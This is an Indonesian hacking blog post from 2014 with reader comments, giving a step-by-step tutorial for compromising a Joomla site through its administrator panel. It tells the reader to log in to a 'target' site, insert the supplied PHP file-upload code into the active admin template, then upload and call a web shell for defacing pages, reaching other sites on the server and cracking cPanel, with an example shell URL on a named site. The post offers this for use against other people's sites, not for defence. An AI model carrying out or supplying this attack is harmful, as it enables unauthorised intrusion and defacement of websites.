Breaking News
Loading...
Wednesday, 22 January 2014

Cara Upload Shell Di CMS Joomla | New 2014


Nah balik lagi ke joomla.
Kali ini ane akan share tutorial cara upload Shell di Joomla ^_^.
Shell ? Buat apa? , Biasanya Untuk Tebas index.php, nyari web lain di dalam web (Jumping), crack Cpanel, Dll.
Kalo untuk tebas index saja, Cara Termudah yaitu edit templatenya aja :v, gaperlu upload shell juga bisa, Kalo belum tau baca dulu di SONO.

Oke langsung ajah :v
Pertama ente harus udah login ke halaman administrator web target.
Kalo belum punya target Baca dulu tutorialnya DISINI


Terus klik "Template Manager"


Lihat Templatee ADMINISTRATOR yang aktif ( Yang Aktif Terdapat Tanda Bintang ), Disini template yang aktif adalah "Bluestork".
Terus klik "Templates" ( Disamping kanan "Styles" )


Terus cari template administrator yang tadi (Disini ane Bluestork).
Terus klik pada judul templatenya.



Terus klik tulisan "Edit Main Page Template"
Terus taruh script ini dibawah script Halaman Administrator.

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Sukses Cukk!!!<b><br><br>'; }
else { echo '<b>Gagal Anjir :3!!!</b><br><br>'; }
}
?>


Terus Save.


Kalau udah sukses di save, ntar akan muncul Fasilitas untuk upload Shell di paling bawah halaman administrator (Yang dikotakin merah).
Lalu klik Chose File, Pilih Shell kamu, Terus klik "Upload".
Kalau sukes tulisanya begini :

Kalau gagal tulisanya "Gagal Anjir :3!!!".
Naah kalo udah sukses tinggal manggil Shellnya :v.
Caranya pergi ke "http://www.site.com/administrator/namashell.php
*Contoh:"http://www.apisupermarket.com/administrator/shell.php
Daaaaannnn Jebret..!!!! Suksesssssss


Nah Terserah dah mau diapain lagi :v

Oke sekian dulu dari ane, Kalo ada yang ga ngerti komen aja, atau tulis aja di buku tamu :v
Byeeeee :v
Add dulu dah : Facebook

Kalau mau Copas harus ada sumbernya ya broh :v

5 komentar:

  1. ane masih setia sama webdav :v
    wakakak

    ReplyDelete
  2. mantap gan .,.
    anejuga sering nyoba tpi lebih sering dapet yang udah di protect sama adminnya..,
    nice post.,.

    ReplyDelete
  3. mantep gan, ane coba dulu, buat nambah ilmu hehe @-)

    ReplyDelete

 
Toggle Footer